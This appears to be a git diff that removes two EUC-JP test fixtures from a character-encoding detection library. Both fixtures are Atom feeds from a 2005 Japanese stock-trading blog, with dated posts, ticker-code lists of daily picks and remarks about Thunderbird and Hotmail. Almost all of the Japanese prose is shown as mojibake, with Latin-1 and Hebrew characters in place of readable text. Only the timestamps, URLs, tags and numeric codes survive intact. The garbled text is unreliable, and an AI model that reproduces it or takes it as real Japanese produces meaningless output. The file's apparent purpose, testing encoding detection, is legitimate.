    ¡¡£³¼ׂ₪ֿ£°£²ַ¯₪ֻ»סִֻף·ָ₪עָ¯ֹ½₪·¡¢¬ּמ₪ֻ₪ט₪ֳ₪ֶ₪ֿ»צ¶ֵָ‎¹ח₪₪ֹ₪ג¿₪ב₪ֶ₪­₪¿¡£

    - -

    ¡¡¢£³פ¼°»‎₪ֱ¹ח₪₪¡¡»סֻ₪־°ֲִך₪עֵּ×₪ֻ¡¢ֽ§¹¥´״·¸₪ֻ₪¢₪כ²ס¼ֶׂ±»־₪¬¸₪₪₪ֻ³פ¼°₪עֽ­₪¹₪כ₪³₪ָ¡£»סֻ¼«ֽ³²½₪ַ³°»ס₪ֻ₪ט₪כ²ס¼ׂ»ַ₪־·ַ°₪¬¶¯₪₪ך¡¢£±£¹£¶£°ַ¯ֲו¸וָ¾₪«₪יµֲ®₪ֻ¹­₪₪ֳ₪¿¡£¥׀¥ײ¥כר²ץ¸ו₪־¶ְָ׃°­²½₪ַ¡¢¶ה¹װ₪עֳז¿´₪ֻ»‎₪ֱ¹ח₪₪₪ע²ע¾ֳ₪¹₪כֶ°₪­₪¬²ֲֳ®₪·¡¢³°¹ס¿ֽ₪־³פ¼°ֽ­ָז־¨₪¬µ³ֲָח₪·₪¿¡£₪³₪־₪¿₪ב»צ¶ָ²ס¼ׂ₪־ֳז₪ֻ₪ֿ¡¢³פ¼°₪־ֱך¸ֽ­₪ה»סִֻף·ָ₪ע¶¯²½₪·₪¿₪ך¡¢¼ט°תְט₪ֻ³פ¼°ֽ­₪ע°ֽֽך₪¹₪כ₪₪ֹ₪־ֶ°₪­₪¬½׀₪ֶ₪₪₪כ¡£ַד¼‎₪״₪־ֹֻ±ׂ÷צ₪ָ₪ֿ₪₪כ₪¬¡¢ֲ¿¿פ₪־³פ¼ח₪ֻ₪ט₪כ·׀±ִ´ֶ»כ₪־ֲ¦ּּ₪«₪י₪ֿ¥¥₪¥¥¹₪ָ₪₪כ¡£

    - -

    ¡¶¦ֶ±¡ֻ

    - -

    ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ

    - -

    ₪¸₪ֳ₪ָ¡¢ֶ°₪­₪ע¸«¼י₪ֳ₪ָ₪­₪₪¹¡¾׀¡ֻ

    ]]> - -
    -
    - -ְֶּ₪־¥ַ¥₪¥ָ¥לֱֳּ¡ - -2005-03-30T16:02:53Z -2005-03-30T15:57:50Z -tag:www.kabu-navi.com,2005:/mt//1.177 -2005-03-30T15:57:50Z -´ֶ»כֱֳּ₪ֿ₪ֱ₪ח₪ֳ₪ֲָ¿₪ב₪ַ₪¹₪¬¡¢ ¼ֲ÷₪ֻ¼ט°ת₪¹₪כ₪־₪ֿ£±₪ִ₪«£²₪ִ₪ַ₪¹¡£ 5771&n... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -´ֶ»כֱֳּ₪ֿ₪ֱ₪ח₪ֳ₪ֲָ¿₪ב₪ַ₪¹₪¬¡¢
    -¼ֲ÷₪ֻ¼ט°ת₪¹₪כ₪־₪ֿ£±₪ִ₪«£²₪ִ₪ַ₪¹¡£

    - -


    -5771 »°ֹ©¿­ֶ¼
    -7221 ¥ָ¥ט¥¿¼ײֲ־
    -5852 ¥¢¡¼¥ל¥¹¥ֶ¥£
    -3570 ¥×¥ך¥«
    -4783 ֶ¥ְ¥₪¥¥¥¯
    -8041 ֲח÷וµ»װ¾ל
    -5916 ¥ֿ¥כ¥ֶ¥ֳ¥¯
    -1834 ¾®ִֵµ·ת
    -1799 ֲט°ל·תְ
    -1754 ֵל¿·½»·ת
    -1846 ־כֻ¥¹©
    -1965 ¥ֶ¥¯¥־ֹ©ֲֿ
    -4925 £ָ£ֱ£ֲ£ֱ
    -9446 ¥¨¥¹¥±¡¼¥¢¥₪

    - -


    -

    ]]> - -
    -
    - -₪ֱ₪ח₪³₪ֳ₪ָ¥ַ¥₪¥ָ¥ל¡¥¢¥י¥₪¥ֹ¥ֶ¥ל¥·¥¹¥¡¼¥כ¥ַ¥£¥ף¥°¥¹ ¡¢ֻ´ײ¥´¥כ¥ױ ¡ֻ - -2005-03-30T01:59:02Z -2005-03-30T01:43:57Z -tag:www.kabu-navi.com,2005:/mt//1.175 -2005-03-30T01:43:57Z -¾¯₪·₪ְ₪±¥ַ¥₪¥ָ¥ל₪·₪₪·₪¿¡£ ¡£µ ₪ה₪ֳ₪ׁ₪ךַה₪ך₪¬ֱב₪₪₪¡¡צ¡צ¡ֻ ֱֳּ₪ֿ₪³₪ל¡£ ¡¡... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -¾¯₪·₪ְ₪±¥ַ¥₪¥ָ¥ל₪·₪₪·₪¿¡£

    - -

    ¡£µ

    - -


    -₪ה₪ֳ₪ׁ₪ךַה₪ך₪¬ֱב₪₪₪¡¡צ¡צ¡ֻ

    - -

    ֱֳּ₪ֿ₪³₪ל¡£

    - -

    ¡¡¥¢¥י¥₪¥ֹ¥ֶ¥ל¥·¥¹¥¡¼¥כ¥ַ¥£¥ף¥°¥¹
    -¡¡ֻ´ײ¥´¥כ¥ױ

    ]]> - -
    -
    - -<![CDATA[3/29¡¡¥ַ¥₪¥ָ¥לֱֳּ¡7769 ¥ך¥÷¥א»‏¡¢8115 ¥א¡¼¥ף¥׀¥ֳ¥ָ¡¢1948 ¹°ֵֵ¼ׂ¡¢₪₪ֹ]]> - -2005-03-28T17:58:31Z -2005-03-28T17:56:30Z -tag:www.kabu-navi.com,2005:/mt//1.173 -2005-03-28T17:56:30Z - - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -3/29₪־¥ַ¥₪¥ָ¥לֱֳּ₪ַ₪¹¡£

    - -


    -7769 ¥ך¥÷¥א»‏
    -8115 ¥א¡¼¥ף¥׀¥ֳ¥ָ
    -1948 ¹°ֵֵ¼ׂ
    -4790 ¥°¥ל¡¼¥¹
    -3209 ¥«¥ֽ¥ט¥¦
    -4831 ¥×¡¼¥׳¥ף¥כ
    -1822 ֲחֻ­·ת
    -7919 ּמ÷ך°ץ
    -9671 ₪ט₪¥י¥ף¥ֹ
    -4815 ££ִ£ֳ
    -6917 ¥ַ¥ף¥»¥₪¥י¥א¥¿
    -

    ]]> - -
    -
    - -Thunderbird¡¥µ¥ף¥ְ¡¼¥׀¡¼¥ֹ¡ֻ¡¢Hotmail₪₪₪±₪כ₪₪¿₪₪₪ַ₪¹¡¦¡¦¡¦ - -2005-03-27T06:17:04Z -2005-03-27T06:09:48Z -tag:www.kabu-navi.com,2005:/mt//1.160 -2005-03-27T06:09:48Z -₪ֹ₪¦₪ג¡× - -₪µ₪ֳ₪½₪¯Hotmail₪ע¼ט₪ך¹‏₪ב₪כ₪ט₪¦₪ֻ₪·₪¿₪₪₪ָ»׳₪₪₪₪¹¡£ - -₪ָ₪ך₪¢₪¨₪÷¡¢¸ז־י₪₪ַ¡_ _¡ֻ - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -ֶµ­ - -ְטֶ¡¢Thunderbird₪ַ₪ֿHotmail¥¢¥«¥¦¥ף¥ָ₪ֿ¸·₪·₪₪₪ָ½ס₪­₪₪·₪¿₪¬¡¢
    -₪ֹ₪¦₪ה₪י₪₪₪±₪כ₪₪¿₪₪₪ַ₪¹¡£

    - -

    ¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯ְט₪־‎₪ֻ¶µ₪¨₪ִֶ÷₪­₪₪·₪¿¡£

    - -

    ₪³₪ֱ₪י¡¡¢×¡¡ֶ¢ֲ©»ׂ₪־½ױ₪¦₪י₪י

    - -


    -Hotmail₪¬¼ט₪ך¹‏₪ב₪ל₪׀¡¢ֱ´₪ֶ₪־¥ב¡¼¥כ₪¬¥µ¥ף¥ְ¡¼¥׀¡¼¥ֹ£±₪ִ₪ַ°·₪¨₪כ₪־₪ַ¡¢³ֳ₪ֻ״ֽר₪ֻ₪₪ך₪₪¹¡£

    - -

    ₪₪¿¡¢RSS¥ך¡¼¥ְ¡¼₪ג»ָ₪₪₪ה₪¹₪₪₪־₪ַ¡¢₪₪ף₪ָ₪ֻ¥µ¥ף¥ְ¡¼¥׀¡¼¥ֹ₪ְ₪±₪ַ₪₪₪₪₪ַ₪¹₪ֽ¡£¡£¡£

    - -

    ₪µ₪י₪׀¡¢¥¢¥¦¥ָ¥כ¥ֳ¥¯¡¦¡¦¡¦

    - -


    -

    ]]> - -
    -
    - -¡ײ₪ִ₪°₪¡¢₪ֹ₪³₪ֻ₪₪₪כ₪־¡©¡׳ - -2005-03-26T13:42:49Z -2005-03-26T13:39:12Z -tag:www.kabu-navi.com,2005:/mt//1.159 -2005-03-26T13:39:12Z -₪¢₪₪ך־ֿ₪ֻ₪ֿ₪₪ל₪₪₪₪«₪ג₪·₪ל₪₪»₪ף₪¬¡¢ֵצ¥ײ¥ם¥°₪ֻ₪ֶ¥ך¥ף¥¯₪ע·ַ÷₪µ₪»₪ִֶ÷₪­₪₪·₪¿¡£ -ּµ»צ₪ֻ¸«₪ִ₪«₪כ₪³₪ָ₪עµ§₪ֳ₪ֶ₪×₪ך₪₪¹¡£ - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -ֶµ­ - -¾®³״ְ¸₪־ּ¼₪µ₪ף₪¬¹װ‎ֹװְּ₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪ט₪¦₪ַ₪¹¡£

    - -

    ¢£₪ִ₪°₪¡¢₪ֹ₪³₪ֻ₪₪₪כ₪־¡©
    -¾®³״ְ¸₪־ּ¼₪¬¹װ‎ֹװְּ₪ֻ₪₪ך₪₪·₪¿¡£₪ֹ₪ף₪÷³÷₪₪³₪ָ₪ַ₪ג₪₪₪₪¡¢¼ך₪¬₪«₪ך₪¬ֽ₪·₪₪ל₪־blog₪ַ₪¹

    - -


    -₪₪₪µ₪ף¡¢₪´¶¨־ֿ₪ע¡×

    ]]> - -
    -
    - -Thunderbird 1.0 ¡§¥ב¡¼¥י¡¼₪ע¥µ¥ף¥ְ¡¼¥׀¡¼¥ֹ₪ֻ₪·₪ֶ₪₪₪·₪¿ - -2005-03-26T13:47:01Z -2005-03-25T18:11:50Z -tag:www.kabu-navi.com,2005:/mt//1.158 -2005-03-25T18:11:50Z -¥µ¥ף¥ְ¡¼¥׀¡¼¥ֹ₪ֻ¾ט´¹₪¨₪₪·₪¿¡× - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -ֶµ­ - -¥ב¡¼¥כ¥¢¥«¥¦¥ף¥ָ₪ע₪₪₪¯₪ִ₪ג»‎₪ֳ₪ֶ₪₪₪כ₪־₪ַ¡¢
    -¥ב¡¼¥י¡¼₪ע¥µ¥ף¥ְ¡¼¥׀¡¼¥ֹ₪ֻ₪·₪ֶ₪₪₪·₪¿¡£

    - -

    ¡¡¢×¡¡Mozilla Japan

    - -


    -₪ה₪ֳ₪ׁ₪ך£¿פ₪־¥¢¥«¥¦¥ף¥ָ₪ע»‎₪ֳ₪ֶ₪₪₪כ₪ָ״ֽר₪ְ₪·¡¢
    -RSS¥ך¡¼¥ְ¡¼₪¬₪₪₪±₪ֶ₪כ¡£

    - -

    ׁ₪¨₪ְֶµ²ע₪ְ₪ֳ₪¿₪±₪ֹ¡¢
    -Hotmailֶֹ₪¹‏₪ב₪₪₪₪־₪¬₪₪₪¿₪₪¡£

    - -

    Hotmail₪־¥ב¥¢¥ֹ»‎₪ִ₪ף₪¸₪ד₪₪«₪ֳ₪¿₪¡¦¡¦¡¦
    -

    ]]> - -
    -
    - -₪ָ₪­₪»₪₪ ¡¡¡ֱ־¾¹ס₪־¥י¡¼¥ב¥ף²°¡ֱ - -2005-03-26T13:44:21Z -2005-03-25T13:16:15Z -tag:www.kabu-navi.com,2005:/mt//1.156 -2005-03-25T13:16:15Z -₪ָ₪­₪»₪₪¥י¡¼¥ב¥ף₪¦₪₪₪₪ַ₪¹₪ט₪ֽ¡£ - - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -ֶµ­ - -¹¥₪­₪¥י¡¼¥ב¥ף²°¡¢±£₪ל₪¿ּ¾ֵ¹₪ֻ₪ִ₪₪₪ֶ½ס₪­₪₪¹¡£

    - -


    -₪³₪־ֵ¹¡¢¾ן₪ֻ¡¢ָ¾¥י¥₪¥¹¥µ¡¼¥׃¥¹¡£

    - -

    ָ¾¥י¥₪¥¹¥µ¡¼¥׃¥¹₪¬₪₪¯₪ֶ₪ג¡¢µֶׂ‏₪כ₪ָ₪×₪ג₪¦₪±₪ֹ¡¢
    -₪½₪³₪¬₪ֻ₪¯₪₪¡£

    - -

    ₪³₪ֳ₪ֶ₪ך¾ּ‎¡¢₪³₪ֳ₪ֶ₪ךּ£ֱ¹¡¢₪₪ף₪ַ₪ג₪×₪₪₪·₪₪¡£
    -₪ַ₪ג¡¢ס­»ׂ₪ֿ₪ֱ₪ח₪ֳ₪ָ¹ג₪₪µ₪₪¬₪¹₪כ¡£

    - -


    -¾ל½ך₪ֿ₪₪ף₪ָ₪ֻױמֱ₪₪ָ₪³₪ם₪ֻ₪¢₪כ₪«₪י¡¢
    -¶ב½ך₪־¿ֽ°³°₪ְ₪ָ¥¥ֻ¥¢₪·₪«¹װ₪«₪₪₪₪ְ₪ם¡ֱ₪¡ֱ₪ָ
    -₪ָ₪₪₪¦₪ָ₪³₪ם₪¬¹¥₪­₪ַ₪¹¡£

    - -


    -¡¡¢×¡¡₪ָ₪­₪»₪₪

    - -


    -¡¡¢×¡¡ָ¾¶ּ¥¯¡¼¥¥ף₪ֳָֿ¿

    ]]> - -
    -
    - -´±ֹ (8245) ֵל¾ ₪ַ¥ַ¥₪¥ָ¥ל¼÷ַװ¡¡צ¡צ¡ֻ - -2005-03-25T04:44:47Z -2005-03-25T04:41:49Z -tag:www.kabu-navi.com,2005:/mt//1.155 -2005-03-25T04:41:49Z -»ֳֽֿ¥ײ¥ל¥₪¥¯¥¢¥¦¥ָ₪ַ»²ֶ‏¡¢₪ג₪ֱ₪ם₪ףַה₪ך¡£ ₪³₪־ֶ‏₪ך‎₪ַ₪³₪־¥ֱ¥ד¡¼¥ָ₪ֿ¸·₪·₪₪¡£ ₪ָ... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -»ֳֽֿ¥ײ¥ל¥₪¥¯¥¢¥¦¥ָ₪ַ»²ֶ‏¡¢₪ג₪ֱ₪ם₪ףַה₪ך¡£

    - -

    ₪³₪־ֶ‏₪ך‎₪ַ₪³₪־¥ֱ¥ד¡¼¥ָ₪ֿ¸·₪·₪₪¡£

    - -

    20050325_8245

    - -


    -₪ָ₪₪₪ֳ₪ֶ₪גֲח₪·₪¿¥ם¥¹₪ַ₪ג₪₪¯¡¢¸ו²ש₪¹₪כ₪ט₪¦₪₪ג₪־₪ַ₪ג₪₪₪₪ַ₪¹₪±₪ֹ¡£
    -

    ]]> - -
    -
    - -ֱך¸¥ך¥ף¥¯₪·₪₪·₪¿¡¡¢×¡¡¾¡₪ִ₪¿₪ב₪־°ֲ״ֵך»ס - -2005-03-25T04:38:15Z -2005-03-24T13:33:53Z -tag:www.kabu-navi.com,2005:/mt//1.144 -2005-03-24T13:33:53Z -¥ב¥כ¥¥¬₪־ֱך¸¾ׂ²נ₪ע₪·₪¿₪־₪¬₪­₪ֳ₪«₪±₪ֳַ־₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢ ³°¹ס°ֲ״¼ט°ת₪ע₪ה₪ֳ₪ֶ₪₪₪כ... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -ֶµ­ - -¥ב¥כ¥¥¬₪־ֱך¸¾ׂ²נ₪ע₪·₪¿₪־₪¬₪­₪ֳ₪«₪±₪ֳַ־₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢
    -³°¹ס°ֲ״¼ט°ת₪ע₪ה₪ֳ₪ֶ₪₪₪כ¿ֽ¡¢₪ה₪ם₪¦₪ָ»׳₪ֳ₪ֶ₪₪₪כ¿ֽ₪ֻ₪ָ₪ֳ₪ֶ₪«₪₪ךֹ¬¸«₪־¥µ¥₪¥ָ₪¬₪¢₪ך₪₪¹¡£

    - -

    »ה₪ֿ¥ז¡¼¥ם¡¿¥ֹ¥כ¡¢¥ֹ¥כ¡¿¥¹¥₪¥¹¥ױ¥י¥ף₪ע¼ט°ת₪·₪ֶ₪₪₪₪¹₪¬¡¢
    -₪³₪־¥µ¥₪¥ָ₪־¥ב¥כ¥¥¬₪־¥ז¡¼¥ם¡¿¥ֹ¥כ₪ע₪ָ₪ֶ₪ג»²¹ֽ₪ֻ₪₪ך₪₪¹¡¡°¡°¡¨

    - -

    ֵך»ס₪ֿ³פ₪ְ₪±₪ַ₪ֿ₪¢₪ך₪₪»₪ף₪«₪י₪ֽ¡£

    - -


    -¡¡¢×¡¡¾¡₪ִ₪¿₪ב₪־°ֲ״ֵך»ס

    - -

    - -


    -

    ]]> - -
    -
    - -ֳז±ּ׃¿¥ (3207¡§ֵל¾) 3/25₪־¥ַ¥₪¥ָ¥לֱֳּ - -2005-03-24T13:34:50Z -2005-03-24T13:30:46Z -tag:www.kabu-navi.com,2005:/mt//1.143 -2005-03-24T13:30:46Z -3/25₪־¥ַ¥₪¥ָ¥לֱֳּ¡£ ₪₪¢¡¢₪₪ֱ₪₪ֱ₪ַ₪¹₪±₪ֹ¡£ 3207 ֳז±ּ׃¿¥ (ֵל¾)... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -3/25₪־¥ַ¥₪¥ָ¥לֱֳּ¡£
    -₪₪¢¡¢₪₪ֱ₪₪ֱ₪ַ₪¹₪±₪ֹ¡£

    - -

    3207 ֳז±ּ׃¿¥ (ֵל¾)
    -6643 ¸ֽ¾וֵֵµ¡ְ½÷מ½ך (ֵל¾)
    -6130 ֶ¿¥ָ¥ה¥ (ֵל¾)
    -7007 ÷´ְ₪½ֵ¹©¶ָ (ֵל¾)
    -3553 ¶¦ֲֿ¥ל¥¶¡¼ (ֵל¾)
    -8245 ´±ֹ (ֵל¾)
    -1880 ¥¹¥כ¥¬¥³¡¼¥¥ל¡¼¥·¥ח¥ף (ֵל¾)

    - -


    -₪₪¢¡¢₪₪ֱ₪₪ֱ¡£

    ]]> - -
    -
    - -÷´ְ₪½ֵ¹©¶ָ (7007) ֵל¾ - -2005-03-23T16:25:40Z -2005-03-23T16:21:28Z -tag:www.kabu-navi.com,2005:/mt//1.141 -2005-03-23T16:21:28Z -3/24¥ַ¥₪¥ָ¥לֱֳּ₪ַ₪¹¡£ 4282 ¥₪¡¼¥װ¡¼¥¨¥¹ (ֵל¾) 7007 ÷´ְ₪½ֵ... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -3/24¥ַ¥₪¥ָ¥לֱֳּ₪ַ₪¹¡£

    - -

    4282 ¥₪¡¼¥װ¡¼¥¨¥¹ (ֵל¾)
    -7007 ÷´ְ₪½ֵ¹©¶ָ (ֵל¾)
    -6378 ֲּ¼²½¹©µ¡ (ֵל¾)
    -2215 ֲט°ל²°ְ½¥ׁ¥ף (ֵל¾)

    - -


    -

    ]]> - -
    -
    - -»ס¶ג₪־־®₪ל¡¡ֵל¾¡¡¢×¡¡¿·¶½»װ¾ל - -2005-03-23T16:16:32Z -2005-03-23T16:01:38Z -tag:www.kabu-navi.com,2005:/mt//1.140 -2005-03-23T16:01:38Z -÷£ֶ₪־¾ו¾÷ֱֳּ₪עֳך½׀₪·₪¿₪ף₪ַ₪¹₪¬¡¢ »ס¶ג₪־־®₪ל‎₪¬°לּ־ֱֶ³¡£ ¾ו°ֱֳּּ₪ֿ¥¸¥ד¥¹¥ְ... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -³פ - -÷£ֶ₪־¾ו¾÷ֱֳּ₪עֳך½׀₪·₪¿₪ף₪ַ₪¹₪¬¡¢
    -»ס¶ג₪־־®₪ל‎₪¬°לּ־ֱֶ³¡£

    - -


    -¾ו°ֱֳּּ₪ֿ¥¸¥ד¥¹¥ְ¥ֳ¥¯¡¢ֲח¾¡¢¥״¥י¥¯¥ל¥¹₪¬₪₪ָ₪ף₪ֹ₪ַ₪¹¡£

    - -


    -₪ִ₪₪ך¡¢¶גֶֻֽ₪־ֵל¾°לֹפֱ´ּּ¹ג¡¡¢×¡¡¥ֻ¥ו¡¼¥ט¡¼¥¯₪־²¼ֽמ¡¡₪ָ₪­₪ֶ¡¢
    -ֵל¾°לֹפֱֳּ₪ַֿה₪י₪ל₪¿·ֱ₪ֻ₪₪כ₪ן₪±₪ַ₪¹₪ֽ¡£

    - -


    -¥ַ¥₪¥ָ¥לֱֳּ₪ֿ₪₪ֵ×ֳז₪ְ₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢
    -½פ»צ¾נ₪ֻ₪ט₪ך½׀ֽט₪₪«₪ֳ₪¿₪־₪¬¡¢₪ָ₪ֶ₪ג»ִַ°₪ַ₪¹¡£

    ]]> - -
    -
    - -ֲ»¼÷₪ע¶²₪ל₪₪₪¡¡¡ֱ¶ג¸ְֿ»½½¸₪«¾ע¡ֱ - -2005-03-23T13:38:03Z -2005-03-23T13:26:54Z -tag:www.kabu-navi.com,2005:/mt//1.129 -2005-03-23T13:26:54Z -₪₪÷₪ֿ¡¢ֻ¸₪«₪י ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ ¡ײ₪³₪־¥׃¥¸¥ֽ¥¹... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¶ג¸ְֿ»½½¸₪«¾ע - -₪₪÷₪ֿ¡¢ֻ¸₪«₪י

    - -

    ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ
    -¡ײ₪³₪־¥׃¥¸¥ֽ¥¹₪ְַ®¸ש₪·₪ֶ₪₪₪כ₪־₪ֿ¡¢₪×¥«¥ֽ₪ע¼÷₪¦₪³₪ָ₪ע
    -₪₪₪ָ₪ן₪₪₪¿ֽ₪¿₪ֱ₪ַ₪¹¡׳₪ָ¥ן¥ָ¥½¥ף₪ֿ¸ל₪ֳ₪ֶ₪₪₪כ¡£
    -¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ

    - -

    ֲח₪­₪¥ך¥¿¡¼¥ף₪עְ¸₪א₪¿₪ב₪ֻ₪ֿ¡¢ֹ¬₪÷½י´ֵך»ס₪¬₪«₪«₪כ¡£
    -₪³₪ל₪ֿ¥׃¥¸¥ֽ¥¹₪־ְ₪³¦₪ַ₪ֿ¾ן¼±₪ַ₪¹¡£

    - -

    »¥ֲ«₪עַ³₪ה₪¹₪³₪ָ₪¬₪ַ₪­₪₪₪₪ָ¡¢ֲח₪­₪ְ®¸ש₪ֿ¼ך₪ֻ₪ַ₪­₪₪₪¡£

    - -


    -³פ₪ַ₪ֿ₪ֹ₪¦₪₪ף₪ַ₪·₪ח₪¦₪«¡£
    -₪א₪ה₪₪ֲֻ»¼÷₪עֹי₪¦ֹ¬ֽ׳₪ֿ₪₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    ₪ֹ₪ֱ₪י₪«₪ָ₪₪₪¦₪ֲָ»¼÷₪¹₪כ₪ָ₪₪₪¦¥ך¥¹¥¯₪ע÷ֲַח¸ֲ²ףָע₪¹₪כ₪³₪ָ₪¬
    -½ֵֽ׳₪ְ₪ָ»׳₪₪₪₪¹₪«₪י¡£

    - -

    ₪·₪«₪·¡¢₪ֹ₪ף₪₪ֻ¥ך¥¹¥¯²ףָע₪·₪ֶ₪ג¡¢ֲ»¼÷₪עֹי₪¦₪³₪ָ₪ֿ₪¢₪ך₪₪¹¡£

    - -

    ֲ»¼÷₪עֹי₪¦₪³₪ָ₪ֿ¡¢ִֻ₪₪עָ¼₪₪¦₪³₪ָ₪ְ₪±₪ֹ¡¢
    -₪½₪־ֲ»¼÷₪ע¶²₪ל₪ֶ₪₪₪ֶ₪ֿ²¿₪ג¼ך₪ֶֻ‏₪ל₪י₪ל₪₪₪¡£

    - -


    -₪ַ₪ֿ¡£

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/blog.kabu-navi.com.xml b/chardet/tests/EUC-JP/blog.kabu-navi.com.xml deleted file mode 100644 index 52244cb..0000000 --- a/chardet/tests/EUC-JP/blog.kabu-navi.com.xml +++ /dev/null @@ -1,539 +0,0 @@ - - - -ֹי₪±₪₪₪ֵך»ס²ָ₪־¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֶֹµ­ - -2005-11-09T15:33:16Z -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֶֹ»ן₪עֳז¿´₪ֻ¡¢¥ַ¥₪¥ָ¥ל¡¼¥ֹ¡₪¿₪₪ֻ₪ה₪כ¡ֻ¡¢°ֲ״¡¢¥×¥׳¥·¥ח¥ף₪₪ֹ₪₪ף₪ַ₪גµ₪₪₪₪ִֻײ₪ך₪₪¹¡£ -tag:blog.kabu-navi.com,2006://1 -Movable Type -Copyright (c) 2005, kabunavi - -₪₪₪₪´¶₪¸₪ַ₪ֿ₪¢₪כ₪¬ - -2005-11-09T15:33:16Z -2005-11-09T15:30:50Z -tag:blog.kabu-navi.com,2005://1.853 -2005-11-09T15:30:50Z -µ׳₪·₪ײ₪ך₪־¹¹¿·₪ַ₪¹₪¬¡¢ ֻטֶ¥ָ¥ל¡¼¥ֹ₪·₪ֶ₪₪¹¡£¡£ ₪₪₪₪´¶₪¸₪ַ¥ָ¥ל¡¼¥ֹ₪ַ₪­₪ֶ₪₪₪ֶ¡¢... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -µ׳₪·₪ײ₪ך₪־¹¹¿·₪ַ₪¹₪¬¡¢
    -ֻטֶ¥ָ¥ל¡¼¥ֹ₪·₪ֶ₪₪¹¡£¡£

    - -


    -₪₪₪₪´¶₪¸₪ַ¥ָ¥ל¡¼¥ֹ₪ַ₪­₪ֶ₪₪₪ֶ¡¢÷£·מ₪ֿ÷ַ¹ג₪־¥¡¼¥¹₪ַ₪¹¡£

    - -


    -₪·₪«₪·¡¢₪³₪¦₪₪₪¦₪ָ₪­₪ֻ₪³₪½¡¢סב₪י₪÷¡¢ֲױֻ‎₪ֻ₪₪י₪÷₪ֻ₪₪₪­₪¿₪₪₪ג₪־₪ַ₪¹¡£

    - -

    ¥ײ¥ל₪₪₪¼«¬₪¬°לָײֲחְ₪ַ₪¹₪«₪י¡£

    ]]> - -
    -
    - -°ל₪ִַהµׁ - -2005-10-28T16:52:04Z -2005-10-28T16:46:48Z -tag:blog.kabu-navi.com,2005://1.851 -2005-10-28T16:46:48Z -÷£ֶ₪ֿ₪³₪־ֱֳּ₪ׂ₪ָ₪ִ₪ְ₪±ֽר³־¡£ ₪ג₪ֳ₪ֲָ¾₪ֻ₪₪₪₪ֱֳּ₪¬₪¢₪כ₪ף₪ַ¾ט₪ך´¹₪¨₪ַ₪¹¡£ ¾ו₪¬... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -÷£ֶ₪ֿ₪³₪־ֱֳּ₪ׂ₪ָ₪ִ₪ְ₪±ֽר³־¡£

    - -


    -₪ג₪ֳ₪ֲָ¾₪ֻ₪₪₪₪ֱֳּ₪¬₪¢₪כ₪ף₪ַ¾ט₪ך´¹₪¨₪ַ₪¹¡£

    - -


    -¾ו₪¬₪ֳ₪¿₪ָ₪³₪ם₪עַה₪ֳ₪ֶ¡¢²¼₪¬₪ך₪­₪ֳ₪¿²¼ֳֽ₪¬¸ַ₪₪ֱֳּ₪ֻ½ח¼¡»ֵ¹‏₪א¡£
    -₪³₪ל₪¬´נֻ₪ַ₪¹₪ֽ¡£

    - -

    - -


    -

    ]]> - -
    -
    - -»ֵ¹‏₪₪ֹ₪­ - -2005-10-27T15:31:23Z -2005-10-27T15:24:39Z -tag:blog.kabu-navi.com,2005://1.847 -2005-10-27T15:24:39Z -÷ַ¶ב₪־¶ב¶·₪«₪י¡£ »‎₪ֱ³פ₪ֿ₪ט₪¯¾ו₪¬₪ֳ₪ֶ₪¯₪ל₪ֶ₪₪₪₪¹¡££±₪ִ₪ע½₪₪₪ֶ¡£ ₪½₪־£±₪ִ₪גַד... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -÷ַ¶ב₪־¶ב¶·₪«₪י¡£

    - -


    -»‎₪ֱ³פ₪ֿ₪ט₪¯¾ו₪¬₪ֳ₪ֶ₪¯₪ל₪ֶ₪₪₪₪¹¡££±₪ִ₪ע½₪₪₪ֶ¡£
    -₪½₪־£±₪ִ₪גַדֳֽ₪ַ₪¹₪«₪י¡¢₪₪¢¡¢ּהֲך₪₪·¡£

    - -


